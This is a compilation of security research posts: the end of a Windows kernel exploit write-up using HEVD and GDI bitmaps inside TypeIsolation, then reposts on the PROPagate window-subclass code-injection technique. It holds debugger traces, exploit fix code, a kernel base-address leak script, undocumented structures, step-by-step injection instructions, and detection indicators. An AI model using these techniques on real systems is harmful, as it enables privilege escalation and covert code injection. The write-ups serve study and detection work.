ULONG64 xored_rtl_bitmap; // + 0x18

ULONG bitmap_hint_index; // + 0x20

ULONG num_commited_views; // + 0x24

} CSECTIONBITMAPALLOCATOR, *PCSECTIONBITMAPALLOCATOR;

Compare the CSectionBitmapAllocator structure above with the contents at 0x1c0000. I defined xor_key as 0xdeadbeefdeadb33f, so that xored_view ^ xor_key and xored_rtl_bitmap ^ xor_key point to the view field and the RTL_BITMAP. While debugging I found that pushlock must point to a valid structure, otherwise a BUGCHECK is triggered, so I allocated memory at 0x1e0000 to hold the pushlock contents.

As described in the second section, bitmap_hint_index is used as a condition to quickly index in the RTL_BITMAP, so this value also needs to be set to 0x00 to indicate the index in RTL_BITMAP. In the same way we look at the structure of RTL_BITMAP.


Typedef struct _RTL_BITMAP {

ULONG64 size; // + 0x00

PVOID bitmap_buffer; // + 0x08

} RTL_BITMAP, *PRTL_BITMAP;

Kd> dyb fffff322401b90b0

76543210 76543210 76543210 76543210

-------- -------- -------- --------

Fffff322`401b90b0 11110000 00000000 00000000 00000000 f0 00 00 00

Fffff322`401b90b4 00000000 00000000 00000000 00000000 00 00 00 00

Fffff322`401b90b8 11000000 10010000 00011011 01000000 c0 90 1b 40

Fffff322`401b90bc 00100010 11110011 11111111 11111111 22 f3 ff ff

Fffff322`401b90c0 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c4 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c8 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90cc 11111111 11111111 11111111 11111111 ff ff ff ff

Kd> dq fffff322401b90b0

Fffff322`401b90b0 00000000`000000f0 fffff322`401b90c0//ptr to rtl_bitmap buffer

Fffff322`401b90c0 ffffffff`ffffffff ffffffff`ffffffff

Fffff322`401b90d0 ffffffff`ffffffff

Here I selected a valid RTL_BITMAP as a template. The first member variable is the size of the RTL_BITMAP, the second points to the bitmap_buffer, and the adjacent bitmap_buffer records the state of the view field bit by bit. To deceive TypeIsolation we set all of these bits to 0, indicating that the view field of the current CSectionEntry item is entirely free; see the fake RTL_BITMAP structure at 0x190000.

Next, we only need to modify the CSectionEntry view and CSectionBitmapAllocator pointer through the HEVD’s Arbitrary write vulnerability.


Kd> dq ffff862e827ca220//before trigger

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 ffff862e`84780000

Ffff862e`827ca240 ffff862e`827f33c0 00000000`00000000

Kd> g // trigger the vulnerability; CSectionEntry->view and CSectionEntry->bitmap_allocator are modified

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21e35 cc int 3

Kd> dq ffff862e827ca220

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 00000000`001f0000

Ffff862e`827ca240 00000000`001c0000 00000000`00000000

Next, we normally allocate a GDI object, call CreateBitmap to create a bitmap object, and then observe the state of the view field.


Kd> g

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21ec8 cc int 3

Kd> dq 1f0280

00000000`001f0280 00000000`00051a2e 00000000`00000000

00000000`001f0290 ffffd40a`cc9fd700 00000000`00000000

00000000`001f02a0 00000000`00051a2e 00000000`00000000

00000000`001f02b0 00000000`00000000 00000002`00000040

00000000`001f02c0 00000000`00000080 ffff862e`8277da30

00000000`001f02d0 ffff862e`8277da30 00003f02`00000040

00000000`001f02e0 00010000`00000003 00000000`00000000

00000000`001f02f0 00000000`04800200 00000000`00000000

You can see that the bitmap kernel object is placed in the fake view field. We can read the bitmap kernel object directly from the userspace. Next, we only need to directly modify the pvScan0 of the bitmap kernel object stored in the userspace, and then call the GetBitmapBits/SetBitmapBits to complete any memory address read and write.

Summarize the exploit process:

Fix for full exploit:

While completing the exploit, I found that a BSOD was generated from time to time, which greatly reduced the stability of the GDI data-only attack. For example:


Kd> !analyze -v

************************************************** *****************************

* *

* Bugcheck Analysis *

* *

************************************************** *****************************




SYSTEM_SERVICE_EXCEPTION (3b)

An exception happened while performing a system service routine.

Arguments:

Arg1: 00000000c0000005, Exception code that caused the bugcheck

Arg2: ffffd7d895bd9847, Address of the instruction which caused the bugcheck

Arg3: ffff8c8f89e98cf0, Address of the context record for the exception that caused the bugcheck

Arg4: 0000000000000000, zero.




Debugging Details:

------------------







OVERLAPPED_MODULE: Address regions for 'dxgmms1' and 'dump_storport.sys' overlap




EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - 0x%08lx




FAULTING_IP:

Win32kbase!NSInstrumentation::CTypeIsolation<163840,640>::AllocateType+47

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi]




CONTEXT: ffff8c8f89e98cf0 -- (.cxr 0xffff8c8f89e98cf0)

.cxr 0xffff8c8f89e98cf0

Rax=ffffdb0039e7c080 rbx=ffffd7a7424e4e00 rcx=ffffdb0039e7c080

Rdx=ffffd7a7424e4e00 rsi=00000000001e0000 rdi=ffffd7a740000660

Rip=ffffd7d895bd9847 rsp=ffff8c8f89e996e0 rbp=0000000000000000

R8=ffff8c8f89e996b8 r9=0000000000000001 r10=7ffffffffffffffc

R11=0000000000000027 r12=00000000000000ea r13=ffffd7a740000680

R14=ffffd7a7424dca70 r15=0000000000000027

Iopl=0 nv up ei pl nz na po nc

Cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206

Win32kbase!NSInstrumentation::CTypeIsolation<163840,640>::AllocateType+0x47:

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi] ds:002b:00000000`001e0000=????????????????

After much tracing, I discovered that the main reason for the BSOD is that the fake structures we created with VirtualAllocEx live in the address space of our current process, and that space is not shared with other processes. That is, once we have used the vulnerability to modify the view field and the CSectionBitmapAllocator pointer, other processes creating GDI objects will also traverse the CSectionEntry list; when they reach the CSectionEntry we modified, the address is invalid in their address space and a BSOD is generated. So I applied my first fix right after the vulnerability is triggered.


DWORD64 fix_bitmapbits1 = 0xffffffffffffffff;

DWORD64 fix_bitmapbits2 = 0xffffffffffff;

DWORD64 fix_number = 0x2800000000;

CopyMemory((void *)(fakertl_bitmap + 0x10), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x18), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x20), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x28), &fix_bitmapbits2, 0x8);

CopyMemory((void *)(fakeallocator + 0x20), &fix_number, 0x8);

In the first fix, I modified bitmap_hint_index and the rtl_bitmap so that, when TypeIsolation traverses the CSectionEntry list, it believes the view field of the fake CSectionEntry is currently full and skips this CSectionEntry.

We know that the current CSectionEntry has been modified by us, so even after we finish the exploit and the process exits, the CSectionEntry will still be part of the CTypeIsolation doubly linked list, while the process memory allocated by VirtualAllocEx is released when our process exits. This would lead to all kinds of unknown errors. Since we already have the ability to read and write arbitrary addresses, I applied a second fix.


ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress, (BYTE *)&CSectionNext, sizeof(DWORD64));

LogMessage(L_INFO, L"Current CSectionEntry->previous: 0x%p", CSectionPrevious);

LogMessage(L_INFO, L"Current CSectionEntry->next: 0x%p", CSectionNext);

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionNext + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionPrevious, (BYTE *)&CSectionNext, sizeof(DWORD64));

In the second fix, I obtained CSectionEntry->previous and CSectionEntry->next and unlinked the current CSectionEntry, so that when GDI object allocation traverses the CSectionEntry list it no longer touches the fake CSectionEntry.

After completing the two fixes, the GDI data-only attack can be used successfully to read and write arbitrary memory addresses. At this point I obtained SYSTEM privileges on the latest version of Windows 10 RS3, but once again, when the process fully exits, a BSoD is triggered. After analysis I found that this BSoD happens because, after the unlink, the GDI handle is still present in the GDI handle table; the cleanup code then looks up the corresponding kernel object in a CSectionEntry and frees it, but the CSectionEntry holding our bitmap kernel object has already been unlinked, which causes the BSoD.

The problem occurs in NtGdiCloseProcess, which is responsible for releasing the GDI object of the current process. The call chain associated with SURFACE is as follows


0e ffff858c`8ef77300 ffff842e`52a57244 win32kbase!SURFACE::bDeleteSurface+0x7ef

0f ffff858c`8ef774d0 ffff842e`52a1303f win32kbase!SURFREF::bDeleteSurface+0x14

10 ffff858c`8ef77500 ffff842e`52a0cbef win32kbase!vCleanupSurfaces+0x87

11 ffff858c`8ef77530 ffff842e`52a0c804 win32kbase!NtGdiCloseProcess+0x11f

bDeleteSurface is responsible for releasing the SURFACE kernel object referenced by the GDI handle table. We need to find the entry of the HBITMAP stored in the fake view in the GDI handle table and set it to 0x0. This skips the subsequent freeing in bDeleteSurface, and HmgNextOwned is then called to release the next GDI object. The key code for finding the location of the HBITMAP in the GDI handle table is in HmgSharedLockCheck; the key code is as follows:


v4 = *(_QWORD *)(*(_QWORD *)(**(_QWORD **)(v10 + 24) + 8 * ((unsigned __int64)(unsigned int)v6 >> 8)) + 16i64 * (unsigned __int8)v6 + 8);

Here I have restored a complete calculation method to find the bitmap object:


*(*(*(*(*win32kbase!gpHandleManager+10)+8)+18)+(hbitmap&0xffff>>8)*8)+hbitmap&0xff*2*8

It is worth mentioning that this requires leaking the base address of win32kbase.sys; at Low IL we would need a vulnerability to leak that information. I used NtQuerySystemInformation at Medium IL to leak the win32kbase.sys base address and compute the gpHandleManager address. After finding the position of the target bitmap object in the GDI handle table through the fake view and setting it to 0x0, the full exploit is finally complete.
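
For completeness, the Medium IL leak mentioned above can be sketched in Python/ctypes as follows, assuming the commonly documented RTL_PROCESS_MODULE_INFORMATION layout; it only illustrates the technique and is not the exploit's code:

import ctypes
from ctypes import wintypes

ntdll = ctypes.WinDLL("ntdll")
SystemModuleInformation = 11          # information class that returns the loaded module list

class RTL_PROCESS_MODULE_INFORMATION(ctypes.Structure):
    _fields_ = [("Section", ctypes.c_void_p),
                ("MappedBase", ctypes.c_void_p),
                ("ImageBase", ctypes.c_void_p),
                ("ImageSize", wintypes.ULONG),
                ("Flags", wintypes.ULONG),
                ("LoadOrderIndex", wintypes.USHORT),
                ("InitOrderIndex", wintypes.USHORT),
                ("LoadCount", wintypes.USHORT),
                ("OffsetToFileName", wintypes.USHORT),
                ("FullPathName", ctypes.c_char * 256)]

def kernel_module_bases():
    size = wintypes.ULONG(0)
    ntdll.NtQuerySystemInformation(SystemModuleInformation, None, 0, ctypes.byref(size))
    buf = ctypes.create_string_buffer(size.value + 0x1000)
    status = ntdll.NtQuerySystemInformation(SystemModuleInformation, buf,
                                            len(buf), ctypes.byref(size))
    if status != 0:
        raise OSError("NtQuerySystemInformation failed: 0x%08x" % (status & 0xffffffff))
    count = ctypes.cast(buf, ctypes.POINTER(wintypes.ULONG)).contents.value
    first = ctypes.sizeof(ctypes.c_void_p)        # the ULONG count is padded to pointer size
    step = ctypes.sizeof(RTL_PROCESS_MODULE_INFORMATION)
    bases = {}
    for i in range(count):
        m = RTL_PROCESS_MODULE_INFORMATION.from_buffer_copy(buf, first + i * step)
        name = m.FullPathName[m.OffsetToFileName:].split(b"\x00")[0].decode(errors="replace")
        bases[name.lower()] = m.ImageBase
    return bases

print(hex(kernel_module_bases().get("win32kbase.sys", 0)))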

Now that the exploit of the kernel is getting harder and harder, a full exploitation often requires the support of other vulnerabilities, such as the info leak. Compared to the oob writes, uaf, double free, and write-what-where, the pool overflow is more complicated with this scenario, because it involves CSectionEntry->previous and CSectionEntry->next problems, but it is not impossible to use this scenario in pool overflow.

If you have any questions, welcome to discuss with me. Thank you!

5 Reference

https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/5A1F/DEFCON-25-5A1F-Demystifying-Kernel-Exploitation-By-Abusing-GDI-Objects.pdf

https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html

https://github.com/sam-b/windows_kernel_address_leaks

New code injection trick named PROPagate

PROPagate code injection technique

@Hexacorn discussed in late 2017 a new code injection technique, which involves hooking existing callback functions in a Window subclass structure. Exploiting this legitimate functionality of windows for malicious purposes will not likely surprise some developers already familiar with hooking existing callback functions in a process. However, it’s still a relatively new technique for many to misuse for code injection, and we’ll likely see it used more and more in future.

For all the details on research conducted by Adam, I suggest the following posts.

 

PROPagate — a new code injection trick

|=======================================================|

Executing code inside a different process space is typically achieved via an injected DLL /system-wide hooks, sideloading, etc./, executing remote threads, APCs, intercepting and modifying the thread context of remote threads, etc. Then there is Gapz/Powerloader code injection (a.k.a. EWMI), AtomBombing, and mapping/unmapping trick with the NtClose patch.

There is one more.

Remember Shatter attacks?

I believe that Gapz trick was created as an attempt to bypass what has been mitigated by the User Interface Privilege Isolation (UIPI). Interestingly, there is actually more than one way to do it, and the trick that I am going to describe below is a much cleaner variant of it – it doesn’t even need any ROP.

There is a class of windows always present on the system that use window subclassing. Window subclassing is just a fancy name for hooking, because during the subclassing process an old window procedure is preserved while the new one is being assigned to the window. The new one then intercepts all the window messages, does whatever it has to do, and then calls the old one.

The ‘native’ window subclassing is done using the SetWindowSubclass API.

When a window is subclassed it gains a new property stored inside its internal structures and with a name depending on a version of comctl32.dll:

  • UxSubclassInfo – version 6.x
  • CC32SubclassInfo – version 5.x

Looking at properties of Windows Explorer child windows we can see that plenty of them use this particular subclassing property:

So do other Windows applications – pretty much any program that leverages standard Windows controls can be of interest, including, say… OllyDbg.

When SetWindowSubclass is called, it uses the SetProp API to set one of these two properties (UxSubclassInfo or CC32SubclassInfo) to point to an area in memory where the old function pointer will be stored. When the new message routine is called, it will then call the GetProp API for the given window and, once the old procedure address is retrieved, it is executed.
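In other words, the mere presence of one of these properties tells you a window has been subclassed via comctl32. A trivial check, as a sketch (the helper name is mine):

#include <windows.h>

// Does this window carry one of the comctl32 subclassing properties?
BOOL IsComctlSubclassed(HWND hWnd)
{
    return GetPropW(hWnd, L"UxSubclassInfo")   != NULL ||  // comctl32 6.x
           GetPropW(hWnd, L"CC32SubclassInfo") != NULL;    // comctl32 5.x
}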

Coming back for a moment to the aforementioned shattering attacks. We can’t use SetWindowLong or SetClassLong (or their newer SetWindowLongPtr and SetClassLongPtr alternatives) any longer to set the address of the window procedure for windows belonging to other processes (via GWL_WNDPROC or GCL_WNDPROC). However, the SetProp function is not affected by this limitation. When it comes to processes at a lower or equal integrity level, the Microsoft documentation says:

SetProp is subject to the restrictions of User Interface Privilege Isolation (UIPI). A process can only call this function on a window belonging to a process of lesser or equal integrity level. When UIPI blocks property changes, GetLastError will return 5.

So, if we talk about other user applications in the same session – there are plenty of them, and we can modify their windows’ properties freely!

I guess you know by now where it is heading:

  • We can freely modify the property of a window belonging to another process.
  • We also know that some properties point to a memory region that stores the old address of the procedure of the subclassed window.
  • The routine that this address points to will at some stage be executed.

All we need is the structure that the UxSubclassInfo/CC32SubclassInfo properties are using. This is actually pretty easy – you can check what SetProp is doing for these subclassed windows. You will quickly realize that the old procedure is stored at offset 0x14 from the beginning of that memory region (the structure is a bit more complex, as it may contain a number of callbacks, but the first one is at 0x14).

So, injecting a small buffer into a target process, ensuring the expected structure is properly filled in and points to the payload, and then changing the respective window property will ensure the payload is executed the next time a message is received by the window (this can be enforced by sending a message).

When I discovered it, I wrote a quick & dirty POC that enumerates all windows with the aforementioned properties (there are lots of them, so pretty much every GUI application is affected). For each subclassing property found I changed it to a random value – as a result Windows Explorer, Total Commander, Process Hacker, OllyDbg, and a few more applications crashed immediately. That was a good sign. I then created a very small shellcode that shows a Message Box on a desktop window and tested it on Windows 10 (under a normal account).

The moment when the shellcode is being called in a first random target (here, Total Commander):

Of course, it also works in Windows Explorer; this is how it looks when executed:


If we check with Process Explorer, we can see the window belongs to explorer.exe.

Testing it on a good ol’ Windows XP and injecting the shellcode into Windows Explorer shows a nice cascade of executed shellcodes, one for each window exposing the subclassing property (in terms of special effects XP always beats Windows 10 – the latter freezes after the first message box shows up; and in case you are wondering why it freezes – it’s because my shellcode is simple and once executed it basically damages the running application):

For obvious reasons I won’t be attaching the source code.

If you are an EDR or sandboxing vendor you should consider monitoring SetProp/SetWindowSubclass APIs as well as their NT alternatives and system services.

And…

This is not the end. There are many other generic properties that can be potentially leveraged in a very same way:

  • The Microsoft Foundation Class Library (MFC) uses ‘AfxOldWndProc423’ property to subclass its windows
  • ControlOfs[HEX] – properties associated with Delphi applications reference in-memory Visual Component Library (VCL) objects
  • Newer Windows frameworks, e.g. Microsoft.Windows.WindowFactory.*, need more research
  • A number of custom controls use ‘subclass’ and I bet they can be modified in a similar way
  • Some properties expose COM/OLE Interfaces e.g. OleDropTargetInterface

If you are curious whether it works between 32- and 64-bit processes – see the follow-up below.

|=======================================================|

 

PROPagate follow-up — Some more Shattering Attack Potentials

|=======================================================|

We now know that one can use SetProp to execute a shellcode inside 32- and 64-bit applications as long as they use windows that are subclassed.

=========================================================

A new trick that allows to execute code in other processes without using remote threads, APC, etc. While describing it, I focused only on 32-bit architecture. One may wonder whether there is a way for it to work on 64-bit systems and even more interestingly – whether there is a possibility to inject/run code between 32- and 64- bit processes.

To test it, I checked my 32-bit code injector on a 64-bit box. It crashed my 64-bit Explorer.exe process in no time.

So, yes, we can change properties of windows belonging to 64-bit processes from a 32-bit process! And yes, you can swap the subclass properties I described previously to point to your injected buffer and eventually make the payload execute! The reason it works is that the original property addresses are stored in the lower 32 bits of the 64-bit offset. Replacing that lower 32-bit part of the offset so that it points to a newly allocated buffer (also in the lower area of memory, thanks to VirtualAllocEx) is enough to trigger the code execution.

See below the GetProp inside explorer.exe retrieving the subclassed property:

So, there you have it… a 32-bit process injecting into a 64-bit process and executing the payload without heaven’s gate or other undocumented tricks.

The below is the moment the 64-bit shellcode is executed:

p.s. the structure of the subclassed callbacks is slightly different inside 64-bit processes due to 64-bit offsets, but again, I don’t want to make it any easier to bad guys than it should be 🙂

=========================================================

There are more possibilities.

While SetWindowLong/SetWindowLongPtr/SetClassLong/SetClassLongPtr are all protected and can be only used on windows belonging to the same process, the very old APIs SetWindowWord and SetClassWord … are not.

As usual, I tested it by enumerating windows from a 32-bit application running on a 64-bit system, setting properties to unpredictable values, and observing what happens.

It turns out that, again, pretty much all my windowed applications crashed on Windows 10. These 16 bits seem to be quite powerful…

I am not a vulnerability researcher, but I bet we can still do something interesting; I will continue poking around. The easy wins I see are similar to SetProp, e.g. GWL_USERDATA may point to some virtual tables/pointers; DWL_USER – as per Microsoft – ‘sets new extra information that is private to the application, such as handles or pointers’. Assuming that we may only modify 16 bits of, e.g., some offset, redirecting it to some code cave or overwriting an unused part of memory within close proximity of the original offset could allow for a successful exploit.

|=======================================================|

 

PROPagate follow-up #2 — Some more Shattering Attack Potentials

|=======================================================|

A few months back I discovered a new code injection technique that I named PROPagate. Using a subclass of a well-known shatter attack one can modify the callback function pointers inside other processes by using Windows APIs like SetProp, and potentially others. After pointing out a few ideas I put it on the back burner for a while, but I knew I would want to explore some more possibilities in the future.

In particular, I was curious what the chances are that one could force the remote process to indirectly call the ‘prohibited’ functions like SetWindowLong or SetClassLong (or their newer alternatives SetWindowLongPtr and SetClassLongPtr), but with arguments that we control (i.e. from a remote process). These APIs are ‘prohibited’ because they can only be called in the context of the process that owns the window, so we can’t directly call them and target windows that belong to other processes.

It turns out this may be possible!

If there is one common way of using the SetWindowLong API, it is to set up pointers and/or fill in window-specific memory areas (allocated per window instance) with values that are initialized immediately after the window is created. The same thing happens when the window is destroyed – during the latter these memory areas are usually freed and set to zeroes, and callbacks are discarded.

These two actions are associated with two very specific window messages:

  • WM_NCCREATE
  • WM_NCDESTROY

In fact, many ‘native’ windows kick off their existence by setting some callbacks in their message handling routines during processing of these two messages.

With that in mind, I started looking at existing processes and got some interesting findings. Here is a snippet of a routine I found inside Windows Explorer that could be potentially abused by a remote process:

Or, its disassembly equivalent (in response to the WM_NCCREATE message):

So… since we can still freely send messages between windows, it would seem that there are a lot of things that can be done here. One could send a specially crafted WM_NCCREATE message to a window that owns this routine and achieve controlled code execution inside another process (the lParam needs to pass the checks and include a pointer to a memory area that includes a callback that will be executed afterwards – this callback could point to malicious code). I may of course be wrong, but I need to explore it further when I find more time.

The other interesting thing I noticed is that some existing window procedures are already written in a way that makes it harder to exploit this issue. They check whether the window-specific data was set, and only if it was NOT do they call the SetWindowLong function. That is, they avoid executing the same initialization code twice.

|=======================================================|

 

No Proof of Concept?

Let’s be honest with ourselves, most of the “good” code injection techniques used by malware authors today are the brainchild of some expert(s) in the field of computer security. Take for example Process Hollowing, AtomBombing, and the more recent Doppelgänging technique.

Mindful of the likelihood of the code being misused, Adam didn’t publish a PoC, but there’s still sufficient information available in the blog posts for a competent person to write their own proof of concept, and it’s only a matter of time before it’s used in the wild anyway.

Update: After publishing this, I discovered it’s currently being used by SmokeLoader, but with a different approach from mine: it uses SetPropA/SetPropW to update the subclass procedure.

I’m not providing source code here either, but given the level of detail, it should be relatively easy to implement your own.

Steps to PROPagate.

  1. Enumerate all window handles and the properties associated with them using EnumProps/EnumPropsEx
  2. Use the GetProp API to retrieve information about the hWnd parameter passed to the WinPropProc callback function. Use “UxSubclassInfo” or “CC32SubclassInfo” as the 2nd parameter (see the sketch below).
    The first property name is used on systems since XP, while the latter is for Windows 2000.
  3. Open the process that owns the subclass and read the structures that contain callback functions. Use GetWindowThreadProcessId to obtain process id for window handle.
  4. Write a payload into the remote process using the usual methods.
  5. Replace the subclass procedure with pointer to payload in memory.
  6. Write the structures back to remote process.

At this point, we can wait for the user to trigger the payload when they activate the process window, or trigger the payload via another API.
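As a rough illustration of steps 1 and 2 only, here is a sketch that uses the documented enumeration APIs, lists candidate windows and their subclass properties, and deliberately does not open, read, or write any remote process (the function names are mine):

#include <windows.h>
#include <stdio.h>

// Report every window that carries a comctl32 subclass property, together
// with the owning process id and the address of the subclass header.
BOOL CALLBACK PropEnumProc(HWND hWnd, LPSTR lpszString, HANDLE hData, ULONG_PTR dwData)
{
    // Properties registered by atom arrive as pseudo-pointers (< 0x10000); skip them.
    if (((ULONG_PTR)lpszString) < 0x10000)
        return TRUE;

    if (lstrcmpA(lpszString, "UxSubclassInfo") == 0 ||
        lstrcmpA(lpszString, "CC32SubclassInfo") == 0)
    {
        DWORD pid = 0;
        GetWindowThreadProcessId(hWnd, &pid);
        printf("hwnd=%p pid=%lu %s -> header at %p\n",
               (void *)hWnd, pid, lpszString, hData);
    }
    return TRUE;  // keep enumerating
}

BOOL CALLBACK ChildEnumProc(HWND hWnd, LPARAM lParam)
{
    EnumPropsExA(hWnd, PropEnumProc, 0);
    return TRUE;
}

BOOL CALLBACK TopEnumProc(HWND hWnd, LPARAM lParam)
{
    EnumPropsExA(hWnd, PropEnumProc, 0);
    EnumChildWindows(hWnd, ChildEnumProc, 0);  // subclassed controls are usually children
    return TRUE;
}

int main(void)
{
    EnumWindows(TopEnumProc, 0);
    return 0;
}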

Subclass callback and structures

Microsoft was kind enough to document the subclass procedure, but unfortunately not the internal structures used to store information about a subclass, so you won’t find them on MSDN or even in sources for WINE or ReactOS.

typedef LRESULT (CALLBACK *SUBCLASSPROC)(
   HWND      hWnd,
   UINT      uMsg,
   WPARAM    wParam,
   LPARAM    lParam,
   UINT_PTR  uIdSubclass,
   DWORD_PTR dwRefData);

Some clever searching by yours truly eventually led to the Windows 2000 source code, which was leaked online in 2004. Behold, the elusive undocumented structures found in subclass.c!

typedef struct _SUBCLASS_CALL {
  SUBCLASSPROC pfnSubclass;    // subclass procedure
  WPARAM       uIdSubclass;    // unique subclass identifier
  DWORD_PTR    dwRefData;      // optional ref data
} SUBCLASS_CALL, *PSUBCLASS_CALL;
typedef struct _SUBCLASS_FRAME {
  UINT    uCallIndex;   // index of next callback to call
  UINT    uDeepestCall; // deepest uCallIndex on stack
// previous subclass frame pointer
  struct _SUBCLASS_FRAME  *pFramePrev;
// header associated with this frame 
  struct _SUBCLASS_HEADER *pHeader;     
} SUBCLASS_FRAME, *PSUBCLASS_FRAME;
typedef struct _SUBCLASS_HEADER {
  UINT           uRefs;        // subclass count
  UINT           uAlloc;       // allocated subclass call nodes
  UINT           uCleanup;     // index of call node to clean up
  DWORD          dwThreadId; // thread id of window we are hooking
  SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
  SUBCLASS_CALL  CallArray[1]; // base of packed call node array
} SUBCLASS_HEADER, *PSUBCLASS_HEADER;

At least now there’s no need to reverse engineer how Windows stores information about subclasses. Phew!
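With these definitions, a quick sanity check confirms the offset mentioned earlier: on a 32-bit build the first callback pointer (CallArray[0].pfnSubclass) sits at offset 0x14 from the start of SUBCLASS_HEADER. A small sketch, assuming the typedefs quoted above are pasted into the same file:

#include <stdio.h>
#include <stddef.h>
#include <windows.h>

/* Paste the SUBCLASSPROC and SUBCLASS_* definitions quoted above before this point. */
int main(void)
{
    /* On a 32-bit build the first line prints 0x14, matching the empirical
       observation from the original post. */
    printf("offsetof(SUBCLASS_HEADER, CallArray) = 0x%02zx\n",
           offsetof(SUBCLASS_HEADER, CallArray));
    printf("offsetof(SUBCLASS_CALL, pfnSubclass) = 0x%02zx\n",
           offsetof(SUBCLASS_CALL, pfnSubclass));
    printf("sizeof(SUBCLASS_CALL)                = 0x%02zx\n",
           sizeof(SUBCLASS_CALL));
    return 0;
}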

Finding suitable targets

I wrongly assumed many processes would be vulnerable to this injection method. I can confirm OllyDbg and Process Hacker to be vulnerable, as Adam mentions in his post, but I did not test other applications. As it happens, only explorer.exe seemed to be a viable target on a plain Windows 7 installation. Rather than search for an arbitrary process that contained a subclass callback, I decided for the purpose of demonstration just to stick with explorer.exe.

The code first enumerates all properties for windows created by explorer.exe. An attempt is made to request information about “UxSubclassInfo”, which if successful will return an address pointer to subclass information in the remote process.

Figure 1 shows a list of subclasses associated with a process id. I’m as perplexed as you might be that some of these subclass addresses appear multiple times. I didn’t investigate.

Figure 1: Address of subclass information and process id for explorer.exe

Attaching a debugger to process id 5924 (explorer.exe) and dumping the first address provides the SUBCLASS_HEADER contents. Figure 2 shows the data for the header, with two highlighted values representing the callback functions.

Figure 2 : Dump of SUBCLASS_HEADER for address 0x003A1BE8

Disassembly of the pointer 0x7448F439 in Figure 3 shows the code is CallOriginalWndProc, located in comctl32.dll.

Figure 3 : Disassembly of callback function for SUBCLASS_CALL

Okay! So now we just read at least one subclass structure from a target process, change the callback address, and wait for explorer.exe to execute the payload. Alternatively, we could write our own SUBCLASS_HEADER to remote memory and update the existing subclassed window with the SetProp API.
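Reading the existing header from the target is straightforward with the APIs listed in the detection section below. A read-only sketch, assuming both processes share the same architecture, that the SUBCLASS_* typedefs quoted earlier are in scope, and that hdrAddr is the remote address obtained from the property enumeration (function and variable names are mine):

#include <windows.h>
#include <stdio.h>

// Dump the first subclass call node of a remote window for inspection.
// This only reads memory; it does not modify the target process.
BOOL DumpRemoteSubclassHeader(DWORD pid, LPCVOID hdrAddr)
{
    HANDLE hProc = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (!hProc) return FALSE;

    SUBCLASS_HEADER hdr;
    SIZE_T got = 0;
    BOOL ok = ReadProcessMemory(hProc, hdrAddr, &hdr, sizeof(hdr), &got);
    if (ok && got == sizeof(hdr)) {
        printf("uRefs=%u uAlloc=%u dwThreadId=%lu\n", hdr.uRefs, hdr.uAlloc, hdr.dwThreadId);
        printf("CallArray[0].pfnSubclass = %p\n", (void *)hdr.CallArray[0].pfnSubclass);
    }
    CloseHandle(hProc);
    return ok;
}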

To overwrite the SUBCLASS_HEADER, all that’s required is to replace the pfnSubclass pointer with the address of the payload and write the structure back to memory. Triggering it may be required unless someone is already using the operating system.

One would be wise to restore the original callback pointer in the subclass header after the payload has executed, in order to avoid explorer.exe crashing.

Update: Smoke Loader probably initializes its own SUBCLASS_HEADER before writing to remote process. I think either way is probably fine. The method I used didn’t call SetProp API.

Detection

The original author may have additional information on how to detect this injection method; however, I think the following strings and APIs are likely sufficient to merit closer investigation of code.

Strings

  • UxSubclassInfo
  • CC32SubclassInfo
  • explorer.exe

API

  • OpenProcess
  • ReadProcessMemory
  • WriteProcessMemory
  • GetPropA/GetPropW
  • SetPropA/SetPropW
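Beyond string and API matching, a behavioural check is also possible: a legitimate comctl32 subclass callback should point into a mapped image, so a pfnSubclass that resolves to private, writable memory in the target process is a strong indicator of PROPagate-style tampering. A minimal sketch of that heuristic (the helper name is mine):

#include <windows.h>

// Returns TRUE if the callback address lies inside a mapped image
// (e.g. comctl32.dll); private memory here is suspicious.
BOOL IsCallbackInMappedImage(HANDLE hProcess, LPCVOID pfnSubclass)
{
    MEMORY_BASIC_INFORMATION mbi = { 0 };
    if (VirtualQueryEx(hProcess, pfnSubclass, &mbi, sizeof(mbi)) != sizeof(mbi))
        return FALSE;
    return mbi.Type == MEM_IMAGE;   // backed by a PE file on disk
}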

Conclusion

This injection method is trivial to implement, and because it affects many versions of Windows, I was surprised nobody published code to show how it worked. Nevertheless, it really is just a case of hooking callback functions in a remote process, and there are many more just like subclass. More to follow!

PE-sieve (previously Hook Finder) — an open-source tool based on libpeconv

PE-sieve (previously known as Hook Finder) is an open-source tool based on libpeconv.
It scans a given process, searching for manually loaded or modified modules. When found, it dumps the modified/suspicious PE along with a report in JSON format detailing the found indicators.
Currently it detects inline hooks, hollowed processes, Process Doppelgänging, injected PE files, etc. If the PE file was patched in memory, it gives a detailed report about where the changed bytes are (and a few other properties).

The tool is under rapid development, so expect frequent updates.

